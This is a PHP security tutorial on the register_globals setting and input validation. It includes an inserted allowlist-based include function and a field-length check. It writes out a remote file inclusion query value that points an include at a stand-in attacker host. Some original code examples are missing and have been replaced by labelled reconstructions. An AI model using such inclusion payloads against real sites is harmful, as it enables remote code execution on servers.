Nowadays, web security is a major concern. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure. The fact that you are here is evidence that you care about security,
Since PHP is a growing language used for web development, it is very important to discuss PHP security.
Input flaws
One of the most common PHP security flaws is unvalidated input. User-provided data simply cannot be trusted and should be validated properly.
register_globals = OFF. The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Enabling register_globals may cause a security risk.
A common example to explain the problem is as follows.
An example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:
With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
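A hardened counterpart to the dynamic include described above, as an added example that is not code from the original article: the request value is used only as a key into a fixed allowlist, so neither register_globals nor a URL in the query string can steer the path. The function name resolve_include, the $pages map and the demo file are assumptions made for illustration.

```php
<?php
// Added example; resolve_include(), $pages and the demo file are hypothetical names.

// Map a request-supplied key to a fixed local file. The request value is only
// ever used as an array key, never as part of the path handed to include.
function resolve_include($requested, array $allowed, $baseDir)
{
    // Reject non-strings (e.g. ?page[]=x) and anything not on the allowlist.
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }
    // realpath() returns false for missing files and resolves symlinks and "..".
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $file === false) {
        return null;
    }
    // Guard against a mistake in the allowlist itself: the resolved file
    // must still sit inside the include directory.
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo: one include file in a temporary directory.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/home.php', '<?php echo "  (home page rendered)\n";');
$pages = array('home' => 'home.php');

// Constructed request values; the second is the decoded value from the text.
// In a real page this would be read explicitly from $_GET, never from a global.
$samples = array('home', 'http://evil.example.org/?', 'unknown', array('home'));
foreach ($samples as $input) {
    $file = resolve_include($input, $pages, $baseDir);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ',
        ($file === null ? 'rejected' : 'included'), "\n";
    if ($file !== null) {
        include $file;
    }
}

// Clean up the demo files.
unlink($baseDir . '/home.php');
rmdir($baseDir);
```

Only the first sample is included; the URL, the unknown key and the array are rejected before include is reached.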
Always validate input data against a maximum length in PHP. You can use an array and foreach to do this.
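<?php
// Maximum allowed length for each POST field.
// 'username' is a placeholder key: the original field name is missing, only the limit 50 survives.
$max = array('username' => 50);
foreach ($max as $key => $val)
{
    // A field that was not submitted is treated as an empty string.
    $value = isset($_POST[$key]) ? $_POST[$key] : '';
    // A non-string value (e.g. field[]=x arrives as an array) cannot be measured with strlen().
    if (!is_string($value) || strlen($value) > $val)
    {
        // display maxlength error
    }
}
?>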